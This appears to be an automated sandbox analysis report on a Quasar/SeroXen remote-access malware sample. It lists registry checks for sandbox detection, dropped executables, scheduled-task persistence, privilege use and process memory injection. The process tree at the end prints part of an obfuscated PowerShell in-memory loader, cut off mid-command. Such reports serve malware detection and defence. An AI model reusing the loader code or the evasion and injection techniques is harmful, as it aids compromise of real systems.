quasar | ca107a58d99a35994a471958721dd64effd8aee01a88885c789211e292359cb1

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	SeroXen Launcher.exe

Executes dropped EXE 4 IoCs

pid	Process
4224	SeroR0X.exe
432	Video.exe
4808	$sxr-powershell.exe
1508	install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
17	raw.githubusercontent.com
18	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2128 set thread context of 2084	2128	powershell.EXE	99

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
4296	schtasks.exe
1612	SCHTASKS.exe
3364	schtasks.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 53 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715335270"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE

Modifies registry class 13 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c9b1d86d-bd7a-4151-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\864d2821-e730-47fe-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\42e4b046-28ee-4b84-	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key deleted	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dd13b577-a9a0-4eda-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\02200299-45a0-46d2-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\82be6fde-bff5-476f-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2128	powershell.EXE
2128	powershell.EXE
2128	powershell.EXE
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe
2084	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	432	Video.exe
Token: SeDebugPrivilege	4808	$sxr-powershell.exe
Token: SeDebugPrivilege	2128	powershell.EXE
Token: SeDebugPrivilege	2128	powershell.EXE
Token: SeDebugPrivilege	2084	dllhost.exe
Token: SeShutdownPrivilege	336	dwm.exe
Token: SeCreatePagefilePrivilege	336	dwm.exe
Token: SeAssignPrimaryTokenPrivilege	1764	svchost.exe
Token: SeIncreaseQuotaPrivilege	1764	svchost.exe
Token: SeSecurityPrivilege	1764	svchost.exe
Token: SeTakeOwnershipPrivilege	1764	svchost.exe
Token: SeLoadDriverPrivilege	1764	svchost.exe
Token: SeSystemtimePrivilege	1764	svchost.exe
Token: SeBackupPrivilege	1764	svchost.exe
Token: SeRestorePrivilege	1764	svchost.exe
Token: SeShutdownPrivilege	1764	svchost.exe
Token: SeSystemEnvironmentPrivilege	1764	svchost.exe
Token: SeUndockPrivilege	1764	svchost.exe
Token: SeManageVolumePrivilege	1764	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1764	svchost.exe
Token: SeIncreaseQuotaPrivilege	1764	svchost.exe
Token: SeSecurityPrivilege	1764	svchost.exe
Token: SeTakeOwnershipPrivilege	1764	svchost.exe
Token: SeLoadDriverPrivilege	1764	svchost.exe
Token: SeSystemtimePrivilege	1764	svchost.exe
Token: SeBackupPrivilege	1764	svchost.exe
Token: SeRestorePrivilege	1764	svchost.exe
Token: SeShutdownPrivilege	1764	svchost.exe
Token: SeSystemEnvironmentPrivilege	1764	svchost.exe
Token: SeUndockPrivilege	1764	svchost.exe
Token: SeManageVolumePrivilege	1764	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1764	svchost.exe
Token: SeIncreaseQuotaPrivilege	1764	svchost.exe
Token: SeSecurityPrivilege	1764	svchost.exe
Token: SeTakeOwnershipPrivilege	1764	svchost.exe
Token: SeLoadDriverPrivilege	1764	svchost.exe
Token: SeSystemtimePrivilege	1764	svchost.exe
Token: SeBackupPrivilege	1764	svchost.exe
Token: SeRestorePrivilege	1764	svchost.exe
Token: SeShutdownPrivilege	1764	svchost.exe
Token: SeSystemEnvironmentPrivilege	1764	svchost.exe
Token: SeUndockPrivilege	1764	svchost.exe
Token: SeManageVolumePrivilege	1764	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1764	svchost.exe
Token: SeIncreaseQuotaPrivilege	1764	svchost.exe
Token: SeSecurityPrivilege	1764	svchost.exe
Token: SeTakeOwnershipPrivilege	1764	svchost.exe
Token: SeLoadDriverPrivilege	1764	svchost.exe
Token: SeSystemtimePrivilege	1764	svchost.exe
Token: SeBackupPrivilege	1764	svchost.exe
Token: SeRestorePrivilege	1764	svchost.exe
Token: SeShutdownPrivilege	1764	svchost.exe
Token: SeSystemEnvironmentPrivilege	1764	svchost.exe
Token: SeUndockPrivilege	1764	svchost.exe
Token: SeManageVolumePrivilege	1764	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1764	svchost.exe
Token: SeIncreaseQuotaPrivilege	1764	svchost.exe
Token: SeSecurityPrivilege	1764	svchost.exe
Token: SeTakeOwnershipPrivilege	1764	svchost.exe
Token: SeLoadDriverPrivilege	1764	svchost.exe
Token: SeSystemtimePrivilege	1764	svchost.exe
Token: SeBackupPrivilege	1764	svchost.exe
Token: SeRestorePrivilege	1764	svchost.exe
Token: SeShutdownPrivilege	1764	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3212	Explorer.EXE
3212	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4808	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4064 wrote to memory of 4224	4064	SeroXen Launcher.exe	83
PID 4064 wrote to memory of 4224	4064	SeroXen Launcher.exe	83
PID 4064 wrote to memory of 432	4064	SeroXen Launcher.exe	84
PID 4064 wrote to memory of 432	4064	SeroXen Launcher.exe	84
PID 4064 wrote to memory of 432	4064	SeroXen Launcher.exe	84
PID 432 wrote to memory of 3364	432	Video.exe	89
PID 432 wrote to memory of 3364	432	Video.exe	89
PID 432 wrote to memory of 3364	432	Video.exe	89
PID 432 wrote to memory of 4808	432	Video.exe	91
PID 432 wrote to memory of 4808	432	Video.exe	91
PID 432 wrote to memory of 4808	432	Video.exe	91
PID 4808 wrote to memory of 4296	4808	$sxr-powershell.exe	92
PID 4808 wrote to memory of 4296	4808	$sxr-powershell.exe	92
PID 4808 wrote to memory of 4296	4808	$sxr-powershell.exe	92
PID 432 wrote to memory of 1508	432	Video.exe	94
PID 432 wrote to memory of 1508	432	Video.exe	94
PID 432 wrote to memory of 1508	432	Video.exe	94
PID 432 wrote to memory of 1612	432	Video.exe	95
PID 432 wrote to memory of 1612	432	Video.exe	95
PID 432 wrote to memory of 1612	432	Video.exe	95
PID 2128 wrote to memory of 2084	2128	powershell.EXE	99
PID 2128 wrote to memory of 2084	2128	powershell.EXE	99
PID 2128 wrote to memory of 2084	2128	powershell.EXE	99
PID 2128 wrote to memory of 2084	2128	powershell.EXE	99
PID 2128 wrote to memory of 2084	2128	powershell.EXE	99
PID 2128 wrote to memory of 2084	2128	powershell.EXE	99
PID 2128 wrote to memory of 2084	2128	powershell.EXE	99
PID 2128 wrote to memory of 2084	2128	powershell.EXE	99
PID 2084 wrote to memory of 612	2084	dllhost.exe	5
PID 2084 wrote to memory of 676	2084	dllhost.exe	7
PID 2084 wrote to memory of 952	2084	dllhost.exe	12
PID 2084 wrote to memory of 336	2084	dllhost.exe	13
PID 2084 wrote to memory of 516	2084	dllhost.exe	14
PID 2084 wrote to memory of 620	2084	dllhost.exe	15
PID 2084 wrote to memory of 1076	2084	dllhost.exe	16
PID 2084 wrote to memory of 1088	2084	dllhost.exe	17
PID 2084 wrote to memory of 1152	2084	dllhost.exe	19
PID 2084 wrote to memory of 1180	2084	dllhost.exe	20
PID 2084 wrote to memory of 1232	2084	dllhost.exe	21
PID 2084 wrote to memory of 1312	2084	dllhost.exe	22
PID 2084 wrote to memory of 1364	2084	dllhost.exe	23
PID 2084 wrote to memory of 1392	2084	dllhost.exe	24
PID 2084 wrote to memory of 1472	2084	dllhost.exe	25
PID 2084 wrote to memory of 1524	2084	dllhost.exe	26
PID 2084 wrote to memory of 1540	2084	dllhost.exe	27
PID 2084 wrote to memory of 1648	2084	dllhost.exe	28
PID 2084 wrote to memory of 1696	2084	dllhost.exe	29
PID 2084 wrote to memory of 1728	2084	dllhost.exe	30
PID 2084 wrote to memory of 1812	2084	dllhost.exe	31
PID 2084 wrote to memory of 1820	2084	dllhost.exe	32
PID 2084 wrote to memory of 1956	2084	dllhost.exe	33
PID 2084 wrote to memory of 2024	2084	dllhost.exe	34
PID 2084 wrote to memory of 2044	2084	dllhost.exe	35
PID 2084 wrote to memory of 1764	2084	dllhost.exe	36
PID 2084 wrote to memory of 1852	2084	dllhost.exe	37
PID 2084 wrote to memory of 2148	2084	dllhost.exe	38
PID 2084 wrote to memory of 2268	2084	dllhost.exe	40
PID 2084 wrote to memory of 2276	2084	dllhost.exe	41
PID 2084 wrote to memory of 2544	2084	dllhost.exe	42
PID 2084 wrote to memory of 2556	2084	dllhost.exe	43
PID 2084 wrote to memory of 2660	2084	dllhost.exe	44
PID 2084 wrote to memory of 2668	2084	dllhost.exe	45
PID 2084 wrote to memory of 2752	2084	dllhost.exe	46
PID 2084 wrote to memory of 2764	2084	dllhost.exe	47

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:336
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6f71a27f-31ca-4d43-a32b-443c9e247b15}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2084

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:516

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1152
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YiCbFoIyvANj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aHnpsJvpZRNcrB,[Parameter(Position=1)][Type]$ntOmwrntZa)$dFigyeCCctI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+[Char](108)+'e'+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+'e'+'m'+[Char](111)+''+'r'+''+[Char](121)+'M'+'o'+'dul'+'e'+'',$False).DefineType('My'+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'ga'+[Char](116)+''+'e'+'T'+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](80)+'u'+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+'n'+[Char](115)+'i'+[Char](67)+'l'+'a'+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dFigyeCCctI.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+[Char](101)+''+','+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+'i'+''+[Char](103)+''+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'